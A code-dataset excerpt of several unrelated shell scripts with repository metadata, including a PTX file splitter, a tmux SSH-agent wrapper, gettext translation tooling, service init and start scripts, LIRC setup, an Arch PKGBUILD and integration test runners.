#Rscript plot_transcriptomics.R B241_U_misc/B241_U_misc_bsr_matrix.txt Up_B241_misc.png B241 Up-Regulated
Rscript plot_transcriptomics.R B241_U_misc/B241_U_misc_bsr_matrix.txt TEMP.png B241 Up-Regulated
}
#alter_headers
plot_images
| true
|
9b02289344136c129f16002dac0f4de5f8c4aac5
|
Shell
|
johngodlee/miombo_tls
|
/src/ptx_split.sh
|
UTF-8
| 604
| 3.984375
| 4
|
[] |
no_license
|
#!/usr/bin/env sh
if [ $# -ne 2 ]; then
printf "Must supply two arguments:\n [1] input.ptx\n [2] output dir\n"
exit 1
fi
# Get lines at which to split
lines=$(rg -n --no-encoding -M 10 "^[0-9]+\s+?$" $1 |
sed 's/:.*//g' |
awk 'NR%2!=0' |
tr '\n' ' ' |
sed 's/^[0-9]\s//g')
# Get name of file without extension
noext="${1%.ptx}"
base=${noext##*/}
# If lines to split is empty:
if [ -z "$lines" ]; then
# Copy file as is with suffix
cp $1 "$2/${base}_0.ptx"
else
# Split file by scans using array dimension rows in header as line ref
csplit -f "$2/$base" -b "_%d.ptx" $1 $lines
fi
| true
|
e350d70ce34555b396ca508431dd18d36d0780a2
|
Shell
|
JRasmusBm/dotfiles
|
/bin/my-tmux
|
UTF-8
| 559
| 3.640625
| 4
|
[] |
no_license
|
#!/bin/zsh
set -e
if command -v emulate &> /dev/null;
then
emulate -L zsh
fi
# Make sure even pre-existing tmux sessions use the latest SSH_AUTH_SOCK.
# (Inspired by: https://gist.github.com/lann/6771001)
local SOCK_SYMLINK=~/.ssh/ssh_auth_sock
if [ -r "$SSH_AUTH_SOCK" -a ! -L "$SSH_AUTH_SOCK" ]; then
ln -sf "$SSH_AUTH_SOCK" $SOCK_SYMLINK
fi
# If provided with args, pass them through.
if [[ -n "$@" ]]; then
env SSH_AUTH_SOCK=$SOCK_SYMLINK tmux "$@"
else
INITIATED_EXTERNALLY=${INITIATED_EXTERNALLY:-false} source_tmux_script "$(pwd)/.tmux"
fi
| true
|
104ef9ffcf3df99e0e81b4e2cab0efcde876fd83
|
Shell
|
engelfrost/generator-diversity-component
|
/app/templates/base/create_pot_and_po_files.sh
|
UTF-8
| 3,076
| 4.15625
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Put this script in the PARENT DIR of your component, then run:
# sh create_pot_and_po_files.sh my-component-name
# To run on all components in a directory, run:
# find . -maxdepth 1 -mindepth 1 -type d -exec sh create_pot_and_po_files.sh {} \;
ROOT="$1"
COMPONENTNAME=${1##*/}
# Make sure the repo is up-to-date
GIT_STATUS=`git --git-dir $ROOT/.git --work-tree=$PWD/$ROOT pull`
if [ "$GIT_STATUS" != "Already up-to-date." ]; then
echo "Aborted."
echo "Please verify that `git pull` succeeded."
echo "Then run the script again"
exit
fi
PO_PATH="$ROOT/po/$COMPONENTNAME"
POTFILES_PATH="$PO_PATH/POTFILES.in"
# Create directories if necessary
mkdir "$PO_PATH" -p
# Create POT file
touch "$PO_PATH/messages.pot"
# Add HTML sources
if [ -e "$POTFILES_PATH" ]; then
rm "$POTFILES_PATH"
fi
touch "$POTFILES_PATH"
# Some data to check against later
POTFILE_SIZE_PRE=`stat -c%s "$PO_PATH/messages.pot"`
# Time to generate the IN file
ls "$ROOT/" | grep .html >> "$POTFILES_PATH"
sed -i -e "s#^#$ROOT/#" "$POTFILES_PATH"
if [ -d "$ROOT/templates" ]; then
grep -rl gettext "$ROOT/templates/" >> "$POTFILES_PATH"
fi
if [ -d "$ROOT/js" ]; then
grep -rl gettext "$ROOT/js/" >> "$POTFILES_PATH"
fi
if [ -d "$ROOT/src" ]; then
grep -rl gettext "$ROOT/src/" >> "$POTFILES_PATH"
fi
# Generate the POT file
xgettext -L Python -f "$POTFILES_PATH" --from-code UTF-8 -o "$PO_PATH/messages.pot" --force-po --add-comments
xgettext -j -L C -f "$POTFILES_PATH" --from-code UTF-8 -o "$PO_PATH/messages.pot" --force-po --add-comments
xgettext -j -L JavaScript -f "$POTFILES_PATH" --from-code UTF-8 -o "$PO_PATH/messages.pot" --force-po --add-comments
sed --in-place "$PO_PATH/messages.pot" --expression=s/CHARSET/UTF-8/
# sed --in-place "$PO_PATH/messages.pot" --expression="s/#: $COMPONENTNAME\//#: /"
rm "$POTFILES_PATH"
POTFILE_SIZE_POST=`stat -c%s "$PO_PATH/messages.pot"`
# We don't care if only the date has changed, and I'm too lazy to write a smarter check
if [ $POTFILE_SIZE_PRE -eq $POTFILE_SIZE_POST ]; then
git --git-dir $ROOT/.git --work-tree=$PWD/$ROOT checkout "po/$COMPONENTNAME/messages.pot"
fi
# Function to create or update PO and JSON files
create_po () {
if [ ! -e "$PO_PATH/$1.po" ]; then
# Create PO file
cp "$PO_PATH/messages.pot" "$PO_PATH/$1.po"
sed --in-place "$PO_PATH/$1.po" --expression=s/CHARSET/UTF-8/
sed --in-place "$PO_PATH/$1.po" --expression=s/Language:\ \\\\n/Language:\ $1\\\\n/
else
# Update PO file
msgmerge "$PO_PATH/$1.po" "$PO_PATH/messages.pot" -o "$PO_PATH/$1.po"
fi
# Create JSON files from PO files
po2json --domain "$COMPONENTNAME" --format jed "$PO_PATH/$1.po" "$PO_PATH/$1.json"
}
# If the POT file is exactly 580 it does not include any translations whatsoever
if [ $POTFILE_SIZE_POST -eq 580 ]; then
rm -r "$ROOT/po"
echo "$COMPONENTNAME: does not need translations"
else
create_po en
create_po sv
cd $ROOT
gulp minify
cd ../
echo "$COMPONENTNAME: updated any PO files and JSON files that needed updating"
# Open files for review
atom $ROOT
fi
| true
|
5abe26e615dd2bada75569de137d4346b503efc3
|
Shell
|
daiyun/SwordGateway
|
/gateway-server/boot/src/scripts/start.sh
|
UTF-8
| 1,263
| 3.515625
| 4
|
[] |
no_license
|
#!/bin/bash
cd `dirname $0`
BIN_DIR=`pwd`
cd ..
DEPLOY_DIR=`pwd`
CONF_DIR=$DEPLOY_DIR/conf
# 查找所有的配置文件,为下面的属性赋值,如果这些属性有冲突,可能会覆盖。maven archetype不能覆盖sh文件,因为有很多字符会转换错误
SERVER_NAME=`hostname`
LOGS_DIR=$DEPLOY_DIR/logs
PIDS=`ps -ef | grep java | grep -v grep | grep "$CONF_DIR" |awk '{print $2}'`
if [ -n "$PIDS" ]; then
echo "ERROR: The $SERVER_NAME already started!"
echo "PID: $PIDS"
exit 1
fi
if [ ! -d $LOGS_DIR ]; then
mkdir $LOGS_DIR
fi
STDOUT_FILE=$LOGS_DIR/stdout.log
LIB_DIR=$DEPLOY_DIR/lib
LIB_JARS=`ls $LIB_DIR|grep .jar|awk '{print "'$LIB_DIR'/"$0}'|tr "\n" ":"`
echo -e "Starting the $SERVER_NAME ...\c"
nohup java $JAVA_OPTS $JAVA_MEM_OPTS $JAVA_DEBUG_OPTS $JAVA_JMX_OPTS -classpath $CONF_DIR:$LIB_JARS com.doctorwork.sword.gateway.Application > $STDOUT_FILE 2>&1 &
COUNT=0
while [ $COUNT -lt 1 ]; do
echo -e ".\c"
sleep 1
COUNT=`ps -f | grep java | grep -v grep | grep "$DEPLOY_DIR" | awk '{print $2}' | wc -l`
if [ $COUNT -gt 0 ]; then
break
fi
done
echo "OK!"
PIDS=`ps -f | grep java | grep -v grep | grep "$DEPLOY_DIR" | awk '{print $2}'`
echo "PID: $PIDS"
echo "STDOUT: $STDOUT_FILE"
| true
|
f048b43e77a384eaf11dfc3263f64f817b7fee24
|
Shell
|
Puqiyuan/Bash-Script-Program
|
/Convert.sh
|
UTF-8
| 404
| 3.046875
| 3
|
[] |
no_license
|
#!/bin/bash
DIR=nice
if [ ! -d "$DIR" ]; then
mkdir nice
for file in *.nas *c *.txt *.h; do
iconv -f SHIFT-JIS -t UTF-8 $file > $file.nice
done
mv *.nice nice
cd nice
for file in *.nice; do
mv "$file" "${file%?????}"
done
rename 'y/A-Z/a-z/' *
for x in *.nas; do mv "$x" "${x%.nas}.asm"; done
fi
cp ~/Makefile .
cp /home/pqy7172/RongOS/z_tools/ ../ -r
| true
|
6b18b577bbd07d24d1b3211dc3275dbcde652c62
|
Shell
|
pld-linux/hhvm
|
/hhvm-fcgi.init
|
UTF-8
| 3,154
| 3.96875
| 4
|
[] |
no_license
|
#!/bin/sh
#
# hhvm-fcgi -- startup script for HHVM FastCGI
#
# chkconfig: 345 80 20
#
# description: Starts The HHVM FastCGI Daemon
# processname: hhvm-fcgi
# config: /etc/hhvm/server.hdf
# pidfile: /var/run/hhvm/hhvm-fcgi.pid
#
# Source function library
. /etc/rc.d/init.d/functions
# Get network config
. /etc/sysconfig/network
# Check that networking is up.
if is_yes "${NETWORKING}"; then
if [ ! -f /var/lock/subsys/network -a "$1" != stop -a "$1" != status ]; then
msg_network_down "HHVM FastCGI Daemon"
exit 1
fi
else
exit 0
fi
# Set defaults
# Default values. This values can be overwritten in '/etc/sysconfig/hhvm-fcgi'
DAEMON="/usr/bin/hhvm"
NAME="hhvm"
CONFIG_FILE="/etc/hhvm/server.hdf"
RUN_AS_USER="http"
LISTEN_PORT="9000"
ADDITIONAL_ARGS=""
# Get service config - may override defaults
[ -f /etc/sysconfig/hhvm-fcgi ] && . /etc/sysconfig/hhvm-fcgi
PIDFILE="/var/run/hhvm/hhvm-fcgi.pid"
DAEMON_ARGS="--config ${CONFIG_FILE} \
--user ${RUN_AS_USER} \
--mode daemon \
-vServer.Type=fastcgi \
-vServer.Port=${LISTEN_PORT} \
-vPidFile=${PIDFILE} \
${ADDITIONAL_ARGS}"
# configtest itself
# must return non-zero if check failed
# output is discarded if checkconfig is ran without details
configtest() {
start-stop-daemon --start --quiet --pidfile $PIDFILE --exec $DAEMON --test
}
# wrapper for configtest
checkconfig() {
local details=${1:-0}
if [ $details = 1 ]; then
# run config test and display report (status action)
show "Checking %s configuration" "HHVM FastCGI Daemon"; busy
local out
out=$(configtest 2>&1)
RETVAL=$?
if [ $RETVAL = 0 ]; then
ok
else
fail
fi
[ "$out" ] && echo >&2 "$out"
else
# run config test and abort with nice message if failed
# (for actions checking status before action).
configtest >/dev/null 2>&1
RETVAL=$?
if [ $RETVAL != 0 ]; then
show "Checking %s configuration" "HHVM FastCGI Daemon"; fail
nls 'Configuration test failed. See details with %s "checkconfig"' $0
exit $RETVAL
fi
fi
}
start() {
# Check if the service is already running?
if [ -f /var/lock/subsys/hhvm-fcgi ]; then
msg_already_running "HHVM FastCGI Daemon"
return
fi
checkconfig
msg_starting "HHVM FastCGI Daemon"
daemon --pidfile $PIDFILE $DAEMON $DAEMON_ARGS
RETVAL=$?
[ $RETVAL -eq 0 ] && touch /var/lock/subsys/hhvm-fcgi
}
stop() {
if [ ! -f /var/lock/subsys/hhvm-fcgi ]; then
msg_not_running "HHVM FastCGI Daemon"
return
fi
# Stop daemons.
msg_stopping "HHVM FastCGI Daemon"
killproc --pidfile $PIDFILE $NAME -TERM
RETVAL=$?
rm -f /var/lock/subsys/hhvm-fcgi
}
condrestart() {
if [ ! -f /var/lock/subsys/hhvm-fcgi ]; then
msg_not_running "HHVM FastCGI Daemon"
RETVAL=$1
return
fi
checkconfig
stop
start
}
RETVAL=0
# See how we were called.
case "$1" in
start)
start
;;
stop)
stop
;;
restart)
checkconfig
stop
start
;;
try-restart)
condrestart 0
;;
force-reload)
condrestart 7
;;
checkconfig|configtest)
checkconfig 1
;;
status)
status --pidfile $PIDFILE hhvm-fcgi hhvm
RETVAL=$?
;;
*)
msg_usage "$0 {start|stop|restart|try-restart|reload|force-reload|checkconfig|status}"
exit 3
esac
exit $RETVAL
| true
|
9f2a0842462458dc2fa59ac63313c7052b37d66b
|
Shell
|
lokialone/protojs
|
/shell/passwordManager/test.sh
|
UTF-8
| 862
| 3.5
| 4
|
[] |
no_license
|
#!/bin/zsh
# author: lokialone
# 密码文件所在位置
filename='/Users/lokalone/record/work/password'
list=()
res=()
# zsh数组下标从1开始。。。
i=1
function diskspace {
clear
df -k
}
function getContentFormFile {
while read line
do
list[${i}]=`echo ${line} | awk -F":" '{print $1}'`
res[${i}]=$line
(( ++i ))
done < $filename
}
function menu {
let j=1
clear
for index in ${list[@]}
do
echo -e "\t${j}. ${index}"
((j++))
done
echo -e "\t0. Exit menu"
echo -en "\t\tEnter an option: "
read -n option
}
function showPasswordInfo {
echo ${res[$option]} | awk -F":" '{print $2}'
}
getContentFormFile
while [ 1 ]
do
menu
case $option in
0)
exit
break;;
*)
showPasswordInfo;;
esac
echo -en "\n\n\t\t\tHit any key to continue"
read -n 1 line
done
clear
| true
|
aa8e4930b93bb2a735e7b6f4c3e1a4d3ae80eadb
|
Shell
|
mskcc/pipeline-kickoff
|
/src/integration-test/resources/scripts/integrationTest.sh
|
UTF-8
| 7,164
| 3.5625
| 4
|
[] |
no_license
|
#!/bin/bash
source "${BASH_SOURCE%/*}/utils.sh"
arguments=("noArg" "-exome")
#arguments=("noArg" "-noPortal" "-f" "-exome" "-s")
init() {
jdk8=~/jdk
java8="${jdk8}/bin/java"
cd "${BASH_SOURCE%/*}"
cd "../../../../.."
echo "Project directory: ${projectDir}"
pwd
testDir="$(pwd)/test"
echo "Clearing test directory ${testDir}"
find ${testDir} -mindepth 1 -delete
expectedPath="${testDir}/expectedOutput"
mkdir -p ${expectedPath}
actualPath="${testDir}/actualOutput"
mkdir -p ${actualPath}
prodKickoff=~/sources/pipeline-kickoff/krista/pipeline_kickoff_prod
prodTestKickoff="${testDir}/pipeline_kickoff_prod/exemplar"
currentKickoff="pipeline-kickoff"
currentTestKickoff="${testDir}/pipeline-kickoff"
testResults="${testDir}/testResults"
failingDir="${testResults}/failing"
mkdir -p ${failingDir}
succeededProjectsList="${testResults}/succeededProjects.txt"
archivePath=~/testIfs/projects/BIC/archive/
echo "Succeeded projects path: ${succeededProjectsList}"
}
getArgName() {
echo "${1//[![:alnum:]]}"
}
getArgToPass() {
if [ "$1" == "noArg" ]; then
echo ""
else
echo "$1"
fi
}
getOutputPath() {
argName=$(getArgName $3)
echo "${1}/${2}/${argName}"
}
runTrunk() {
header3 "Running [PROD] version of Pipeline Kickoff for project ${1} with argument $2"
echo "Changing directory to ${prodTestKickoff}"
cd ${prodTestKickoff}
outputPath=$(getOutputPath $expectedPath $1 $2)
echo "Output path: ${outputPath}"
mkdir -p ${outputPath}
argToPass=$(getArgToPass $2)
echo "Argument passed: ${argToPass}"
${java8} -cp lib/*:classes org.mskcc.kickoff.lims.CreateManifestSheet -p ${1} -o ${outputPath} -rerunReason TEST ${argToPass}
cd ~
}
runCurrent() {
header3 "Running [CURRENT] version of Pipeline Kickoff for project ${1} with argument $2"
echo "Chaging directory to ${currentTestKickoff}"
cd ${currentTestKickoff}
outputPath=$(getOutputPath $actualPath $1 $2)
echo "Output path: ${outputPath}"
mkdir -p ${outputPath}
argToPass=$(getArgToPass $2)
echo "Argument passed: ${argToPass}"
./gradlew run -Dspring.profiles.active=test,igo -PprogramArgs=-p,${1},-o,${outputPath},-rerunReason,TEST,${argToPass}
#${java8} -cp .:libs/*:build/classes/main:build/resources/main -Dspring.profiles.active=dev org.mskcc.kickoff.lims.CreateManifestSheet -p ${1} -o ${outputPath} -rerunReason TEST ${argToPass}
cd ~
}
runTest() {
header3 "Running [TEST] comparing trunk and current for project $1 with argument $2"
echo "Changing directory to ${currentTestKickoff}"
cd ${currentTestKickoff}
actual=$(getOutputPath $actualPath $1 $2)
expected=$(getOutputPath $expectedPath $1 $2)
echo "Actual output path: $actual"
echo "Expected output path: $expected"
./gradlew regressionTest -Dspring.profiles.active=test,igo -Darg=${2} -Dproject=${1} -DexpectedOutput=${expected} -DactualOutput=${actual} -DfailingOutputPath=${failingDir} -DsucceededProjectsList=${succeededProjectsList}
#${java8} -cp .:libs/*:build/classes/main:build/classes/integrationTest:build/resources/integrationTest -Dspring.profiles.active=dev -Darg=${2} -Dproject=${1} -DexpectedOutput=${expected} -DactualOutput=${actual} -DfailingOutputPath=${failingDir} -DsucceededProjectsList=${succeededProjectsList} org.junit.runner.JUnitCore org.mskcc.kickoff.characterisationTest.RegressionTest
cd ~
}
copySourceCode() {
echo "Copying prod source code from: ${prodKickoff} to test directory: ${testDir}"
rsync -az --exclude '.*' ${prodKickoff} "${testDir}/"
echo "Copying current kickoff source code from: ${currentKickoff} to test directory: ${testDir}"
rsync -az --exclude '.*' ${currentKickoff} "${testDir}/"
}
clearOutputPaths() {
if [ ${forceTrunk} = "true" ]; then
find ${expectedPath} -mindepth 1 -delete
fi
find ${actualPath} -mindepth 1 -delete
rm -f ${failedProjectsList}
rm -f ${succeededProjectsList}
}
clearArchivePath() {
echo "Clearning archive path ${archivePath}"
find ${archivePath} -mindepth 1 -delete
}
printResults() {
allSucceeded="true"
echo "Test results"
IFS=$'\n' read -d '' -r -a succeededProjects < "${succeededProjectsList}"
for project in "${projects[@]}";
do
for arg in "${arguments[@]}";
do
projectWithArg="${project}${arg}"
if [[ "${succeededProjects[@]}" =~ "${projectWithArg}" ]]; then
success "$project with arg $arg"
else
error "$project with arg $arg"
allSucceeded="false"
fi
done
done
if [ ${allSucceeded} == "false" ]; then
echo "For full information about failed tests visit: ${failingDir}"
fi
}
forceTrunk="false"
if [ $# -gt 0 ] && [ $1 = "force" ]; then
forceTrunk="true"
fi
init $1
projects=(
"01234_EWA" # not exising project
"02756_B" # !BicAutorunnable, Recipe WholeExome, Xenograft
"03498_D" # Canno be run through Create manifest sheet
"04298_C" # Recipe WholeGenomeSeq
"04298_D" # !manual Demux
"04495" # manual Demux
"04657_D" # ChIPSeq recipe
"05257_AX" # investigator patient IDs are problematic
"05372_B" # Request name *PACT*
"05500_AZ" # !BicAutorunnable && "NOT_AUTORUNNABLE" in Readme
"05514_I" # IMPACT bait set
"05583_F" #pairing changes
"05600" # No Status Sequence Analysis QC
"05667_AB" #pairing changes
"05667_AT" #pairing changes
"05667_AW" #pairing changes
"05667_AY"
"05684_D" # KK- NimlegenHybridizationProtocol1
"05737_R" # HEMEPACT_v3 bait set, species in Xenograft
"05816_AA"
"05873_H" # Failed Sequence Analysis QC
"05971_G" # IMPACT bait set, species in Xenograft
"06049_I" #pairing changes
"06049_R" #pairing changes
"06049_U" #pairing changes
"06208_D" # Agilient Capture KAPA Libary
"06259_B"
"06362" #no sample level qc
#"06477_E" # !KAPAAgilentCaptureProtocol2, very slow project
"06507" # Request with 2 samples with same name
"06507_D" # rename FASTQ
"06507_E"
"06836_E" # IMPACT bait set, two samples are failed in post process QC
"06907_J"
"06912_B" # Failed Reprocess Sequence Analysis QC
"06938_M" # Exemplar Sample status Failed-Complete
"06990_E"
"07037_O"
"07165_D"
"07275" # germline-no pipeline run
"07306_D" # Request with 2 samples with same name
"07323_F" #pairing changes
"07372_B"
"07437_B" # BR7 and BR11 match each other, neither one matches corresponding DMP normal
"07473" # Under review Sequence Analysis QC
"07507_B" # no recipe in the sample sheet
"07520"
"07527_B"
"08192_E" # no tumor
)
projectsList=$(printf ",%s" "${projects[@]}")
header1 "Running Pipeline Kickoff tests for projects ${projectsList:1}"
copySourceCode
echo "Clearing output paths: ${expectedPath} and ${actualPath}"
clearOutputPaths
for project in ${projects[*]}
do
for arg in "${arguments[@]}"
do
header2 "Running test for project ${project} with argument ${arg}"
clearArchivePath
expectedDir=$(getOutputPath $expectedPath $project $arg)
echo "Expected dir: ${expectedDir}"
if [ ${forceTrunk} = "false" ] && [ -d ${expectedDir} ]; then
echo "Skipping running trunk as output for project ${project} already exists"
echo "To force always running trunk even when trunk output is already generated pass 'force' argument to script"
else
runTrunk $project $arg
fi
runCurrent $project $arg
runTest $project $arg
done
done
printResults
| true
|
9995cbf427849b27aaf1faeed70ec2216555253f
|
Shell
|
CCI-MOC/openshift-acct-mgt
|
/tools/crc/deploy.sh
|
UTF-8
| 1,067
| 3.34375
| 3
|
[] |
no_license
|
# Build and Deploy openshift-acct-mgt on CRC
#
# Requires prior `oc login` and running from root of repo.
#
# Deployment will be done in namespace named `onboarding`.
# To deploy to a different namespace, change the name in `project.yaml`
# and variable `NAMESPACE`.
set -e
if [ "$(uname)" == "Darwin" ]; then
CMD="docker"
INSECURE_FLAG=""
else
CMD="sudo podman"
INSECURE_FLAG="--tls-verify=false"
fi
INTERNAL_REGISTRY="default-route-openshift-image-registry.apps-crc.testing"
# yaml spec rather than new-project command for idempotency
NAMESPACE="onboarding"
oc apply -f tools/crc/project.yaml
$CMD login $INSECURE_FLAG -u kubeadmin -p "$(oc whoami -t)" "$INTERNAL_REGISTRY"
$CMD build . -t "$INTERNAL_REGISTRY/$NAMESPACE/openshift-acct-mgt:latest"
$CMD push $INSECURE_FLAG "$INTERNAL_REGISTRY/$NAMESPACE/openshift-acct-mgt:latest"
oc apply -k k8s/overlays/crc
# TODO: Check for error state
while [ "$(oc -n onboarding get pods | grep onboarding | grep -v deploy | grep -c Running)" == "0" ]; do
echo "Waiting until pod is ready..."
sleep 10
done
| true
|
97d033500df05a1b4eb42def14dd66878f91dc93
|
Shell
|
notalentgeek/pedge
|
/script/raspbian_jessie/lirc.sh
|
UTF-8
| 3,247
| 3.34375
| 3
|
[] |
no_license
|
#!/bin/bash
# Change directory to `/home/pi`.
cd /home/pi &&
# Update, upgrade, and install packages.
# Update and upgrade packages.
yes | sudo DEBIAN_FRONTEND=noninteractive apt-get -yq update &&
yes | sudo DEBIAN_FRONTEND=noninteractive apt-get -yq upgrade &&
# Install packages.
yes | sudo DEBIAN_FRONTEND=noninteractive apt-get -yq install lirc liblircclient-dev &&
# Configure boot setup.
sudo /bin/sh -c 'printf "\ndtoverlay=lirc-rpi,gpio_in_pin=23,gpio_out_pin=22" >> /boot/config.txt' &&
# Configure GPIO for IR transceiver.
sudo /bin/sh -c 'printf ""\nlirc_dev\nlirc_rpi gpio_in_pin=23 gpio_out_pin=22"" >> /etc/modules' &&
# Create local LIRC run commands.
sudo /bin/sh -c 'printf "\nbegin\n button = KEY_1\n config = KEY_1\n prog = pysoc\nend\nbegin\n button = KEY_2\n config = KEY_2\n prog = pysoc\nend\nbegin\n button = KEY_3\n config = KEY_3\n prog = pysoc\nend" > /home/pi/.lircrc' &&
# Create system - wide LIRC run commands.
sudo /bin/sh -c 'printf "\nbegin\n button = KEY_1\n config = KEY_1\n prog = pysoc\nend\nbegin\n button = KEY_2\n config = KEY_2\n prog = pysoc\nend\nbegin\n button = KEY_3\n config = KEY_3\n prog = pysoc\nend" > /etc/lirc/lircrc' &&
# Re - create hardware configuration.
# Delete hardware configuration.
sudo rm /etc/lirc/hardware.conf &&
# Create hardware configuration.
sudo /bin/sh -c 'printf "\n########################################################\n# /etc/lirc/hardware.conf\n#\n# Arguments which will be used when launching lircd\nLIRCD_ARGS=\"--uinput\"\n\n# Do not start lircmd even if there seems to be a good config file\n# START_LIRCMD=false\n\n# Do not start irexec, even if a good config file seems to exist.\n# START_IREXEC=false\n\n# Try to load appropriate kernel modules\nLOAD_MODULES=true\n\n# Run \"lircd --driver=help\" for a list of supported drivers.\nDRIVER=\"default\"\n# usually /dev/lirc0 is the correct setting for systems using udev\nDEVICE=\"/dev/lirc0\"\nMODULES=\"lirc_rpi\"\n\n# Default configuration files for your hardware if any\nLIRCD_CONF=\"\"\nLIRCMD_CONF=\"\"\n########################################################" > /etc/lirc/hardware.conf' &&
# Re - create IR dictionary.
# Delete IR dictionary.
sudo rm /etc/lirc/lircd.conf &&
# Create IR dictionary.
sudo /bin/sh -c 'printf "\n# Please make this file available to others\n# by sending it to <lirc@bartelmus.de>\n#\n# this config file was automatically generated\n# using lirc-0.9.0-pre1(default) on Sat Jan 7 22:45:56 2017\n#\n# contributed by \n#\n# brand: /home/pi/lircd.conf\n# model no. of remote control: \n# devices being controlled by this remote:\n#\nbegin remote\n name pysoc\n bits 13\n flags RC5|CONST_LENGTH\n eps 30\n aeps 100\n one 924 840\n zero 924 840\n plead 970\n gap 113287\n toggle_bit_mask 0x0\n begin codes\n KEY_1 0x1001\n KEY_2 0x1002\n KEY_3 0x1003\n end codes\nend remote" > /etc/lirc/lircd.conf' &&
# Re - start LIRC service.
# Stop LIRC service.
sudo /etc/init.d/lirc stop &&
# Start LIRC service.
sudo /etc/init.d/lirc start
| true
|
478896f68c87daa1c4d7635a742dfe46c881244f
|
Shell
|
s23870-pj-Patryk-Literski/sop2020-21_25c
|
/s18504/lab3/cwicz2/zad5.sh
|
UTF-8
| 127
| 2.703125
| 3
|
[] |
no_license
|
#!/bin/bash
input=($@)
for ((i=0; i<$#; i++)) do
cat ${input[$i]}; done
for ((i=$#-1; i>=0; i--)) do
cat ${input[$i]}; done
| true
|
3b50bb41b4692c84f5a0b1846bde0bff410651c1
|
Shell
|
olayad/bash-bootcamp
|
/localusers/luser-demo08.sh
|
UTF-8
| 918
| 3.9375
| 4
|
[] |
no_license
|
#!/bin/bash
# This script demonstrate I/O redirection.
# Redirect STDOUT to a file
FILE="/tmp/data"
head -n1 /etc/passwd > ${FILE}
# Redirect STDIN to a program
echo
read LINE < ${FILE}
echo "Contents of line: ${LINE}"
# Redirct STDOUT to a file, appending to the file
echo
echo "${RANDOM} ${RANDOM}" >> ${FILE}
echo "Contents of ${FILE}:"
cat ${FILE}
# Redirect STDIN to a program, using FD 0.
read LINE 0< ${FILE}
echo
echo "LINE contains: ${LINE}"
# Redirect STDOUT to a file using FD 1, overwritting the the file
head -n3 /etc/passwd 1> ${FILE}
echo
echo "Contents of ${FILE}"
cat ${FILE}
# Send output to STDERR
echo
echo "This is STDERR!" >&2
# Discard STDOUT
echo
echo "Discarding STDOUT:"
head -n3 /etc/passwd /fakefile > /dev/null
# Discard STDOUT and STDERR
echo
echo "Discarding both STDOUT and STDERR:"
head -n3 /etc/passwd /fakefile &> /dev/null
# Clean up
rm ${FILE} ${ERR_FILE} &> /dev/null
| true
|
b8f71ca8a4cffe5e2ea559b94feef2606671dd04
|
Shell
|
zxxzxxxxz/reversi_nn
|
/loop.sh
|
UTF-8
| 454
| 2.578125
| 3
|
[] |
no_license
|
#!/bin/bash -eu
X_TRAIN_PATH="$HOME/.reversi_nn/x_train.npy"
Y_TRAIN_PATH="$HOME/.reversi_nn/y_train.npy"
X_TEST_PATH="$HOME/.reversi_nn/x_test.npy"
Y_TEST_PATH="$HOME/.reversi_nn/y_test.npy"
MODEL_PATH="$HOME/.reversi_nn/model.h5"
python3 generate_testdata.py $X_TEST_PATH $Y_TEST_PATH
while true
do
python3 generate_traindata.py $X_TRAIN_PATH $Y_TRAIN_PATH
python3 train.py $MODEL_PATH $X_TRAIN_PATH $Y_TRAIN_PATH $X_TEST_PATH $Y_TEST_PATH
done
| true
|
78b1da39d7b976a72f0db4721fc9e2935aab8875
|
Shell
|
levilelis/psvn
|
/chen/astar/hanoi_astar_pred.sh
|
UTF-8
| 645
| 2.859375
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Set the limit to ~2 GB
ulimit -v 6000000
#set the time limit to one hour
#ulimit -t 600
# Path to which the results will be added
RESULTS=resultshash_multipleprobes/hanoi
OUTPUT=a_star_hanoi_4p_12d_1000_abst_1_2
for PROBES in 100; do
for META_PROBES in 1000 2000 3000 10000; do
printf ${PROBES}" "${META_PROBES}"\n" >> ${RESULTS}/${OUTPUT}_${PROBES}_${META_PROBES}
(./hanoi_4p_12d.chenastar ${PROBES} ${META_PROBES} 0 0 0 ../../pdb/hanoi/hanoi_4p_12d_1 ../../problems/hanoi/hanoi_4p_12d_1000 ../solutions/hanoi/a_star_hanoi_4p_12d_1000_abst_1 >> ${RESULTS}/${OUTPUT}_${PROBES}_${META_PROBES}) &
done
done
echo
| true
|
cdbee80cfeebf88043799145dd9a3ca496213427
|
Shell
|
delkyd/alfheim_linux-PKGBUILDS
|
/vault-ssh-helper/PKGBUILD
|
UTF-8
| 1,108
| 2.828125
| 3
|
[] |
no_license
|
# Maintainer: Adrián Pérez de Castro <aperez@igalia.com>
pkgname='vault-ssh-helper'
pkgdesc='Allows using OTP authentication generated by a Vault server'
pkgver='0.1.3'
pkgrel='1'
url='https://github.com/hashicorp/vault-ssh-helper/'
arch=('x86_64' 'i686')
license=('MPL')
makedepends=('go')
depends=('glibc')
source=("${url}/archive/v${pkgver}.tar.gz")
sha512sums=('ff42e86c941ada0352eb58f29ab36785d9ca2777fbfa8f1b830e752e37376b258ad812e75b764709a1b1f22d34dffafb3515e3f196386987875a1a5fcfb04759')
_srcpath='src/github.com/hashicorp/vault-ssh-helper'
prepare () {
if [[ ! -r ${_srcpath} ]] ; then
mkdir -p "$(dirname "${_srcpath}")"
ln -s "$(pwd)/${pkgname}-${pkgver}" "${_srcpath}"
fi
export GOPATH="${srcdir}:$(pwd)"
cd "${_srcpath}"
make updatedeps NAME=${pkgname}
go generate ./...
}
build () {
export GOPATH="${srcdir}:$(pwd)"
cd "${_srcpath}"
go build -v -o "${srcdir}/vault-ssh-helper"
}
package () {
install -Dm755 "${srcdir}/vault-ssh-helper" \
"${pkgdir}/usr/bin/vault-ssh-helper"
install -Dm644 "${pkgname}-${pkgver}/README.md" \
"${pkgdir}/usr/share/doc/${pkgname}/README.md"
}
| true
|
7eaa8786be7c752300f33acb60dc516aab178fdb
|
Shell
|
angular-hispano/angular
|
/aio/scripts/deploy-to-firebase.test.sh
|
UTF-8
| 3,358
| 3.265625
| 3
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
set +x -eu -o pipefail
readonly deployToFirebaseDryRun="`dirname $0`/deploy-to-firebase.sh --dry-run"
function check {
if [[ $1 == $2 ]]; then
echo Pass
exit 0
fi
echo Fail
echo ---- Expected ----
echo "$2"
echo ---- Actual ----
echo "$1"
exit 1
}
(
echo ===== master - skip deploy - not angular
actual=$(
export BASH_ENV=/dev/null
export CI_REPO_OWNER=angular
export CI_REPO_NAME=notangular
$deployToFirebaseDryRun
)
expected="Skipping deploy because this is not angular/angular."
check "$actual" "$expected"
)
(
